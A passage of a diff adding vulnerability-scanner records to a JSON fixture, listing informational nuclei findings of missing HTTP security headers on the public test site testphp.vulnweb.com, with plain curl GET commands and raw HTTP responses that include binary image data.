Edg/105.0.1343.50' 'http://testphp.vulnweb.com/pictures/5.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/5.jpg.tn", + "discovered_date": "2024-11-13T02:42:18.843Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/5.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4428\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:12 GMT\r\nEtag: "4dca64a1-114c"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001b\u0002\u0003\u0001\u0001\u0001\u0004\u0002\u0003\u0005\u0001\u0007\u0006��2\u0010\u0002\u0002\u0001\u0003\u0003\u0002\u0004\u0006\u0002\u0002\u0003\u0001\u0001\u0002\u0003\u0011\u0004\u0012!1AQ\u0013"\u00052aq\u0006\u0014#B����R�\u0015b�r��\u001b\u0001\u0001\u0005\u0001\u0001\u0002\u0001\u0003\u0004\u0005\u0006\u0007��/\u0011\u0001\u0003\u0002\u0005\u0001\u0007\u0004\u0002\u0003\u0001\u0002\u0003\u0004\u0011\u0005\u0012!1A\u0013Qaq����"���\u0006�\u00142���\f\u0003\u0001\u0002\u0011\u0003\u0011?�\u001a�d�������0�V\u0015��gQ�%XmƲ ��Tg6�ru�Ʋ0��G\n>2y��d�EV\u0019m}3�1��<*������qY\u0016`��d��6�k"�w��r�{0�qY.��\u0019*>3��F\u001e\u0013u�\f�\u000f\u0018�Du2i��h.�H�2��\t\u0019^Ӗ�.z*�J��\u001d\u0014\u0002�@2ء\u0012\t\u0018=�+\u0012T\u00176.�-��EcZA\u0012,�*�!\t\u0003o\u0007�:�<��x����Fh�u�'\u000b\b6\u0001&�\u0003��\f4\r�|�Ӽ�@\u0005��>[$LL\r2Ѡ���\u0019ƈ���Ӆ�����\u0007�=N��2<t�R�*Xr�r�\u001d8?+\u000b�#2H��1�\u0012D�ሠ\u0006�6�9\u0006�o�}�\u0001`ֻV�V\f���./c�Y�p��4�z\u000fH�\u0011V\n��\u001b��u�\u0012)X\u0005�n��:��aU\u0004��\r?�?�\b�\rm^�����\r}��\nF�\u0019��I\u0004J�\u0015:�\u0003�d�?��SϬ��$!�j\u0004�6�_�_\u001fk�\r\\��UM4�(\b\u0016\u0017$����t���x$\u000e\u0019\u0003q�#ʚ�>�+\u001a9�3�;V��8��c��Lz\u0007Ӽ�6�53�\u0012�eZ8\t4\u0018���J�\u001c\u000e��4�@��M��1���\u0005EF�r9*H�(qV\u000b���,�q��������m��%� �\u0006�B�p�\u0004�1b\u0010��j9$�}?���,[M���\u0001\u001b�kQ\u001dױ�`�+l�iqf����Ww�%+\u0018���]���$�p/8󿡣�@���r�E�k\u001d�6<�\b��c\u0006�IYX���/�q��R:\u0018�5\n^%e\u001eǐ�\u0007��U}��<��&��R��)\u0012H��\r���<�9�&�W�I6�?a?9���!�uR��51>�\u000e��\u001e\u001dDl-8;ā����6\u000f?B\u001b\\n�jꧠ��q~c��i����$SH�\u00132L�@�W�*ё�f�z��+��m9���\u0014�b*��V�Z4o���V��\u001a�ٷJʭ�H�����\u000ex��\u001b�(��%�;+��U0��XKo���hi�\r4~��~`��(b»�z׎����h@`���6�eGݶ��V\b�\u0005�ʦ���6���\r�;�\u001d\t�@��s�C\u0014r�R3\u001f��2\t\u0014i���TG�:\u0010\b���B�'�(\\e�p� |�R�.�\u000b���t\u0005��\u0002C��7\u0016���"����8�\u0007M�E$,�&\u0014\u000e�<�\u0007��\u001d\t�4�JҼ�~��9jC,d�ف\u001c\u0001�;�]�\u0007kZ߇��P��\u0015�2�(k��/�\u0011�M���:�d�N�����林ԝ�CpX��8�/�\u0016<�\u001c�8������'�kkb�u\u0011G/�^O�T\u0014x�}Gׯ�Š�sJ\u0015�e\n�w�ZW�\r\u001e/�W{]{\u0005��UQ22]a}{�>]OK��F�*D&�7;��{��Q\u0010���C�P�G����v(\u0001��O8�ZWi��\u0001i#4֥A�ш��sW]��\u0013$�4N\u001fiV�n�\u0006\u001c��\u0010~��9#\u0001:\u0015F�H\u0003���\u0001��S���"��A%��x��\u000fw5���\u0003*�\u0003\u0016�IY�HY\u001byqE@��5��o�۾��\u0012(U_dP�V4-)$�J,�l�"��ךˌ\r,pƞ�s���\u00197B��-�C�m��\u000f\u0016\r��B�f�\u001b\u0014����\u001fE�ڄ����18��\u001d��UoU��"�оؤӳ0\u0006�p3cT����#�5\r$6x�\u0010z�&ʶ�Th\u001a#�V-\u0002j\u0002\u0015\u0005\t��\t\u0014M_#�\u001b�\u0005\u001e/+�óJ���F���%�K��R�F�*�2����~��hi�%d�4�Ez�\u0015BG�\u0006�5`t�\u0003�������*��I�\u000eù�9<e��@����xԊfQVv�@�]��xÂ��zI��c�\u0005u�A#*:�B\u0003Q�M\u0003G�DgSB���ޑ3����Z��\u0001�y\u0001�t錬\n�$��]\u0001\u0004�ˎ�x�\t��Y�\u0002��:d\u001a�A\u0010�f�\u001c�-�{�-tv݁���V2�.W5Y�\u0018\u000bKέ��,yt蓕�U��fP�[o�]\u0001aۥu'\u0011\u0012)��+\u0017ݹ\u001c8*\b,\b�{w\u0007���I�]\u0013Țy�\u0012eYD�C!dV\u001e�\t5�A�\u0002��\u000eT�B}k��1�2�K\u001f\u0014��.k\\30��F.ڗ\bݭ�}�j�,o�[\u0013\u001b\u001c�\u001a�<Qʂ�ov]�`�n��\u0012mH��^�古T�|r��]�\u0002O\u0015�u'�\u001c���������$�\u00166�rgK��]��\u0019����:�\n_;��}�\r�j\u0010�����sn�N�]��뷋��L�L�E\u0014Q�Wolq�v\u0002�/h#ڶ;��rT\u001b����1X�{I{@��d��d�\u000fóG�D�j�(Ν��\tm\u001f1a@��r7X\r^E�@�t�!�U�+\u001bI��GP\u0019�\nwn��\u0010\u000f\u001b�b\u000fZ 篡�ӟO<���bd(����i�n��o\u001b���q��������7z\u0016#�U���������fe^\u001a���.kYrQ�4E�5����d��\u001c\u0002NԠ�\u0010��$w��O�0$\u0012��x���L���\u0004��.�lR�c�H5���Ŭ1��Y\n�\u0006�\\\u0005\u0003�_<�n�՞2��'u�84s�B\u001a��i��J\u0002�*�GI1�a\u0011�6�T��\u000b*�\u000bW�\u001f�~���P`��P��ۻ1w��fbI�9���h��\b����\u0015QI&�\u0001G=z<��\u0015_\u0012�i\u0001/c@��ZS�H��b\u0012��\u0018�K�`R9w,G\u0002\r_S���K�ַZ��~!9�4��5Dc܇jPF\u001cݐ�l}�{4���锉��*fm�����׻h\u0015f��\u0019{z!��\u001d8W`_���\u0005�W`C��o�=M�\fG\u000fu`\u0001���\u0010\u0019%<��fk����I/�4_\u0001�/�f_�,(�HǫРM�=\u0005�?z�mY;����\t\nzu��篃]\u000em|GYꬔ�B�%MY՟�\u0017]<�kkUQ\u0015���V76�D�������\f�������/�p�M\u0010!����o��J�[�;\u001b\u0004_RB�#\u0005��@�� �=8$_�p�Y\nV�2\u0016�%��\u0007��yѨgӘ\r\u0018�=7W��\u001f�\u0016�|\u001b=1��b�+�<�� <O�j�\u0003V玎�+~�Q����x���\u001d��?\u0010O,_��'��C\u001bN�b�<�n\n\u0018��n��\u0018�\u0015d_��N\u0011��;�\fȼ���͑��{4�tq�:HF�I57"�\f�\u0013a�F��������B��'$���\u0019cy^��8���\u001e6�^E�\u000e_����ru��La��\u0019�6�\r\u0005t$\u0017b�\u0016�kn9�U���?�U�m�\u0015��O5|�z#��;.��Ԛ�i*���v�b\u0005� ]mcԟq��\f�l��\t%E�\u001c�'?��O\u0007�'��)�њ8�\u000b�u\u0006�Y���nQ�ߥ�9��\u0002\r\n��W\u0015�����i�u�qFY�)U�n��\u0002��ӽ\u000b$�,~f#(t��87���G>*�}z��/{�@5S��z\u0016�\n�!f�H�\u0019\u0002m\f�6��n�\u001b`\u0005�NVȻ\u0013�9\u0004��]����7W�,�,��_zG\fP@�!�\u0004h��\n\u0005\u0001}�;�p�,��d��Z�O\u0003�j<�t�\b�A2\u001a�\u0013|u�+��*�S�Ԑ\u0011�3���������h��?A�V2\t�,�\u0015��*���A�Zy����d'k*�-�M����n�\u0007��\u0016E�S\u0011C\u000b�%���_�}�50j\u0016#�i�ƀ���W�U��j�y�1\u000b\u0006��\u0013��$��2Q�uA��P��I�2i=�\u001b��\rq�h�P+�\t��$��\r$���x�`��\u0001\u0007�\u0004U����p\u0004E�Ԅt8�Dl!����\u000e��\u0016���%�j&�\u001eÓҸ\u001c�\u0005��uh�eT\by��ہ\u0016v��]��;���k�^��/#6�����l�\b\u0015`\u0002�x\u0007�8�{<�\u0007\u0006�\u0015���ZD�\u0002Á�Z�Yv�3X�x�]�\u000b9:v����\u001c\u001fo��*�t������l'���\u0015d�)�XC����A?�[�;\u001e0̆�\u0006���{$�:\u0011~E�\u001eˌE_�:�cd�6����@\t x\u001f�ZX�0���r\b�\u000b&�X5q��W��\u00114!Ķ(\u000b�P�\u0015�!`�\fQP��\u0016]���S@(n�\u0015<�?sB�h����=\u001e,�&�63��׿mO�ȅ\t I�C\u001c��\u0010�ɽ�ŀ꠆�u\u0004\u001a�#��|�`j��T�\u0014h�1=�\u0004W ݃�&󷦱�fU\u0014\u000b��#�O'��F�>y�\u0013�1���|�&U\u0004�`,{�\n8�g�$���N�!sjň\u00062�]\u001b����Uu�s����s�`t%�T�\u001bzr���\u001bd$h�����&�鿱Q��Z2��J�E3�.��#���\njd3\u0015�L��R�E��d�\u001cw<p:_$N҅�Nc\u0006��\nO���T�5\b�G#iF�\u0011?.����@������Y�y\u001c�̞h*gf\u0014�3-�N��#B;��z���b\u00074t�E�P�ʦ3 ��v��H\u0004\u000b�\u0016y=,���\u0014�"x�\u0002�����J�\u0005J�<�$�\u0004U^Dح�כ\u001dc�c\u001aK��K_���9^\u0018�W�aZ�]��Զ’\u0002�T�\u0006(y��\u000f���9c\u001c<�\u0014���,�t��Y��_o\u0019\u0016������7��b�T��cma��q�Y�^\u0017��N#V+�q�.�C"���L\b�M��:\u0002~�k�|�}�xA�*���8����Y\u00022�*�\u0004\n6��\u0001�\u0003���\u000e+�I\u001e�T\u0004\u0006�*�t�/8Xb��\f�akr��V4��$���Cvp��.W�\b\u001a�\r��5F\u0016�7F�o[�\u001d�#��w}1��n\u0010MHٛ���k��L�,Z��\u0005\u0014Esȫ\u0007�:x�k�U��h�~ߘ���^*��\u0019��8X���|x4L:�Ga����]Z�\u001b,jC9�!�\u001e\b����ŞVaL���Qg9~p\f��+���\u0019�\u001a��l�p�\u0018�Q�\f1'F\u0018a�$g\u0018�\u0018c\u0014�u\u001d��o�\u0018bR���\u0018`�F\u0018a�$a�\u0018�Fr�\u0018bF�a�\u0018(���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 885, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/pictures/4.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/4.jpg.tn", + "discovered_date": "2024-11-13T02:42:19.029Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/4.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4615\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:58 GMT\r\nEtag: "4dca64a1-1207"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0002\u0003\u0001\u0001\u0001\u0001\u0004\u0005\u0003\u0006\u0002\u0001\u0007\b��5\u0010\u0002\u0002\u0001\u0003\u0003\u0002\u0005\u0002\u0005\u0003\u0005\u0001\u0001\u0002\u0003\u0011\u0004\u0012!\u00051A\u0013Q\u0006"aq�\u0014�#2B��R��%3���b��\u001a\u0001\u0002\u0003\u0001\u0001\u0001\u0003\u0002\u0005\u0004\u0006��0\u0011\u0002\u0002\u0001\u0003\u0001\u0006\u0005\u0003\u0005\u0001\u0001\u0002\u0003\u0011\u0012!1A\u0004\u0013"2Qq\u0005a���3��\u0014#Rb����\f\u0003\u0001\u0002\u0011\u0003\u0011?K4�5���\u001d�Ô\u0012I�?�#Y6��^�s`\u001f��# 2�#Ag��&V\u0016\u000f���:����'���02t��>\u001cnX3P�W��s��D�-���#�&8�3���q�\u0011�A�4\t�����0+���F�!�4�"��#�)c�\u0002�\u001b�zTZ��Wo\u0015�<s\r��\u00159D��&�\tRտ��\u000b�kZ$�������Z��>�{�rB�2�]�U]�wy \u001f\u001d���\u0010~�\r\u0006�K��ۊ�k�~����8\u000f��~fI\t\u001b�\u0015D\u001e���\u001d<�+\u0014(�v\u0002�j\u0003�?(Xi�|��RZ\u001e�C��o�.\u001e)w ! 3n\u000b�\u0013E���agU˔#BX�\u0002����=M���\u001a�}�\u0006�\u0002�=��\u001c��ca̭I���!�\u0003�N�Y�\u0019�0UdK��\b'��U����m��^>�Q��\u0012*��Q�\u000f\u001ac\u001c�\u0005�F���*�\\�4����ՆP\u0007<~t��U\u0014�2�<�gz��\u000f$Y���e�\u0006�?3\u0003�\n<v���X\u000e`U,p&�7�C\u0017�cW\u0006hP3/��[=�?�f\u001aL���"��ʑ��r�,�\u0015�*�\b.�"�$�\u0016{�\u0018="l����v��l�<�U#��I�r�x��ֶ�/�A�\u0015�C� BĒhj�-�g����\u0007�Г4���CL�\u0018\b��(�h�\u000by\u001c�B�\u0017�f&<pƱ�\u001a�(��(\u0001�5\\*\u0005\n�q�:��\u001bE\u0016&\\�����Q�\u0013�utg��}����\u0003��\u0019?��\t\u0014��@�\u001e,�����鼓n]/���U܄���Z\u0007��:[�ԃdK\u0004��e'bHl���s]������:\u000e�\u001c�ގ�9�?��U\u0010�)���:�\u0003+P\u0004��aF�X�<\u001b≩��0A��\u0003��X]O!�\u001a\u0003���A�H����6���{\u001f�T6�Ǭgvl�\u001e�[���X\u001c����\u0007=���o�M��/}f����W�\bn��8���\u0016"I�/A\u001b\u0005�������<��uy"R�ŀ���������\n\u001cԺ�t���,孨\u0011�P�A�\r��\u001a+3;ч��F;T{��[�����\u0016�V�6�uL��e��\nۈ,YX���?��N:.*b@����Q5}�������\u0007Ցi��}�������\n;��ד�h��/�Ӂ���9hw\u001f[���\\\\92_w��\u0010��\u0018�\u000b��\u001f�'��w3��8\u0001Yop\u0006ڂ�l�+C���:��r�t`zLV�A�|\u001f�\u0003��\u0002;\u0017�D�mm���\f̾���@�B7)��2�H��Ǜ�\\\u0011VF�};�'��L*@ۈV4O�ߑu��p1��ُ\u0018E�hw>��?]<��\u001fM\u0010�L�f�Sa\fƌ\n}t|_���15F����\u000e�\u0015\u000fSD\u001d^�\\��\t(\u001cX�j�:�:�\f�\u0018�y\u0007]�\u001fm#��`��S#*\b�@f\u000e�\u0015_sΪ\u001dy^L��\t�1Ŵ���k�7|7\u0015|}E���#3�#29�r8`{Q�΢\u000f�!�F$e۸�\u0018Ճ��<w\u0014k��uFN\u0013㱓\r�Ѱ��\u001d��·l�U&�r=��GϿ���ͦ�4�:�9�C���O��\u0015Z\u0012|�\\�$�\u0016b\u0015bI \n\u001c���^uT��f!��!�V��Uoɮkށ5�\u001e�\t�W�3(,�~`�F������k,���o4��r80����3��7Uλ���\u0015\u0001��;�\u001et�ى�����\b>ڂ^E����M�����@\u001as�=ŘC�\u0001�(�p�˘ϐ���)��"�<�0�z�7ȡ����yI\u0004b��{��8c��s=%A�&h�u�-�\u0001���3��f�\u0011���k�#��\b\u001d�滊҈D��z��+���O��cP\u0007a�x\u001fm<3Y��g�%\u001b�������"a,�|���k\u001e\u0001�kM�\u0015h\u000eݴ�\u0019UG}^z�\u0011r�(\u001e�k���\u0014N&f���4p����`<��.\u000f�Rf\u000b\u001cr��LE��\u0004w�a�\u0013;�d�$X�\u0018�o�($���A\u001e���\\���t��[��q'P�\u0014/,����I�\u001a\u001e_�q��#74I`E-{�?��F�\u0011|?��\u001eJL\u0015\f��.@!d\u0003�\u0006���oO��me��t��1���8 �5�>��~u\u0001c�B�93����pS\u0019\b���\u0003nu䊢;P����S'&N��2"���\u0006W��G�<��\u0011‚ǎIZ�l?��\u000f\u001b\u0010�\u0005YV�c\fB�\u0015��\u001am�Ӡ�%H�DU�ÿ���\r$�dր�D��bu\u0003�,�2\u001c��匨X���!,�\u0018�\u0017d\u0011\\�\u001ac��\u001b����dIe�(\u001fP�IT�qUVŅ�<\u000f�:�E\n�8�H�x�Um+�\u0006֟���p�_P�'�#��\u001a\u0007*e�9\u0004r\u0015\u000e�[k0��}�P~�L�V'\u00042���<��A�v��H}x��\u0013_�����\u0019L�B��X��B\u0014\u0005RV@K\u0012�KpG�\u000bDrh��3ʞN�xZ�����\u0006��VyY�o�w\u0010\u0016��\u001a�\u0011L�"���\u0005\u0004�s��s�>�y�m6���8��K0�"X��[Q�\u0016\u000bE�$�#q�g�\u001ck±�Ħ�*�һ�\fy#m\u000e,7�6\u0001��}#�\u001c���,����U��6ڀ���FGs��8\u001bZ�Zڋ�t�\u0017�,�\u001a��z�Wj7���UR��s@�\u000e\u0015\u0012\f�A�j����\u0013,H;�%\n��\u0016,_o���^��]�0�G�6��\u0014�n�\u001d�:�*_\\��1y�|��\u0004aM�v�F�B�_j��(�\u0006��o^���\\\r�����23\u001e�e�\u001d\u0013p\u0004�\u0004�\u0007�<\u000f�\u001a�3�$\u0003���\u0007��m\u0005�\u001cKF�>羝c\u0015\u0015ڵ���'\u0013\u001e��v\\�� �͖�䊾�(�<��8}\u000e\u0012�g&m����#��\u001f�����u��4Ǒx�N\u0015/]�s��\u000e�ohN/O�y1!n9e��7�\u0018�(�\u0006�Ǖ}��a\f����\u0004��a\n\u0001㶎�@ \u001f���ƍ��\u0007Τ���\u0017�\u0010@�18��\u001d\u0017\u001bX\u001e�BH\\c������܂4B\u001e~�\\։\u0004��?MP��I\r��ݹ��z���I� wfc�\u0015\u0014Y��@{\u0001��4ר.Yp�4E\n#�V$|�\u001bo4l]\u001e;���̼KT2wT��\u0013�\u001b?1���\u001e\u0007�IuR<+7������!{\u0010O�\u0013\u000e�3Y\u0016D�cb\u0003�a[�\u0018X\u0006��\u0001�ڹ\u00122[a�\u0007������\u000e\\,eґAU!@�߸\u001c�7ި{k\u000f��}Y����٢�\f\u0018ϰ|\u000f��_\u000f┃\u001f�ފ%\rD_'r��\u0004W\u0017ߛ�1�\u001bu\u0015�̝�(��]�T\u0016�l��Ln��\u0015Wܒöc#v8�9m\\��\u001bQ�Bֈ�]��^�9\u0001�.ϕ���N�ş��ן���l�&����p72��ܮ\t\u001f�T��n;\\M\u0005&�er�\u0006�E�n�Q<v<X44:\u0002Ɖ�{��h�@G��U��Q���1�O�Y�u��0ر\u0016p7\u001d���^O���������^�WƂ�,�N�N��I�L�:�%\t��������d\t�\fL���P�\u001d\u0016\u001c�#\r1eC`m\u000bb��U���ǁE&&zez���\u0018(P�[�\u001b6�7F����p5~\u0014��\u0001FR=��|`\rk�T��e�h�>/�H�}Y\\��qH�G�\u0001~/p�o����&���\u001a)V4�\u0004J�\u000e��\u0018�E\n<��^�ֆ\b�\u0003�\u001d\f �����̯~O L�?W��#�VV�f�dJ2P;��;�U\n�Y���:�x\u001d>6�7�-��V2ށ,F�7\u000f��أ}�j#�R;\r\\�>\u0016]�1�p<��>�w��1\f\u001f\u0015��4%�\u001e�V(��捀A\u0006��{���\u001f�P�\u000e>T�\u0015�r\u0002:�b�\u00057`\u001e\t����ӡb��#GUz�\u000e�h\n\u0003m�\u0001�@d�\u001b�4\u00016��x�<J\u0002�c�)a`\u001a&�w��\t\u0001����~ M�n�u����3�{\u001a\u0004�{���Lq��,��\\�\t��SI�S{\u001b�G�\u000f���|;!�\u0010���&r.�*�T[\u000e~m�h_��F�\u001d\u0003��VwM��9�I�4��ƕ\u0003!<w#m��}��\u0016\u000eO"@�zϞ�<p#3��)=\\�\tP���[���0�!\f��#J״�`S�<|��W�1�ۜ�H",h*�:S)}��u�b�p����D#\u0001{�\u001a��B�\u0006�;��4X�\u000b~M\u0002k�\u000e�?O���6@BѻF�\u001c:�5`�D\u001a���m\u0005�\n�H��\u0003w\u0002�����bj\\�\u0007��t��]���x�Z3HСD%����T�\u0017B�\u001e��v��\u0002��[�B>cc�u�P�|���˃d����\u0015����\u0016@;\u001et���I q���\u001c|���J���CL��1�%@�B��\b\u0004�5�\u001b\u0017V<�8��#�Q\u001364�E#Fɹ\u0018���k\u000e<\u0010H#�$jΒޤ~���S�������Z�:\u000f\u001d'5����zs;�Ӥ��6�\r\u0015$i�⤠nE?q���sK\u0019h\u0018�( �5d]_﫺fw�L\u0019$�k�G�\\��ЧO��m�1�����\u000e��H���\n��x\u0004]�}���<���$0ώ��\u0010�B7314\u0015Tr����c�j���\u001aJ�]A\u0017tG�\u0007L����s�嶰g�8��W\u001f"F�\\\t\u0013�S��_c�:���GYy�\u0002z��\u0011;U���\u0001I��]�w�گ�d�t��Xs\u001d�fW��\u001c���x\u0004X�/�W����D\u0005\u0015�C7�U����p+β]\u001b�<l�}Rޒ\u000b�C]�\u0007����@�bN�"20e"�\u0006�\u001a� �\u0014�T��\u0011�>8�\b�����������Q��\u0010N�;�\u001a�b\u0007ƺQgV��^5�e�B\u0004��Ƞ\u001e5��$�Ա�؟I�\u0012\u0001�������u�_���\u001d��~�\u0018Ѫ��Ҝh���1�A\u0013�\u001bA�����/����_�U�cV��\u0007�m_�\u00188S�@����SSUn\u001b��p>Oβ�\u0001���3�\u000fU����\ba�\\��SSV>E�J�����,u\u0006���:�\u001cO\u0003�\u00048B������Ӝef}$�\u0006=e�\tf˗��Z�m���ε���\u001a��)�\u0010\\1a\u0002\u001f\u0012�;k��\u0018��\b�����ՌX�ez�\u0004\u0011u���������=F\u0006�,\u001d��\u0004�菅sr'N�,�10亠�Ty�ۏmMM$y�='[oW��3W��T��}'\u001f+$ ��$( p�{�5���ښ�a�r�&\u0018�ͫ�󩩮\u000ba\u0013��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 886, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51' 'http://testphp.vulnweb.com/cgi-bin/1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin/1", + "discovered_date": "2024-11-13T02:42:19.224Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin/1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 887, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36' 'http://testphp.vulnweb.com/pictures/3.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/3.jpg.tn", + "discovered_date": "2024-11-13T02:42:19.414Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/3.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3725\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-e8d"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , 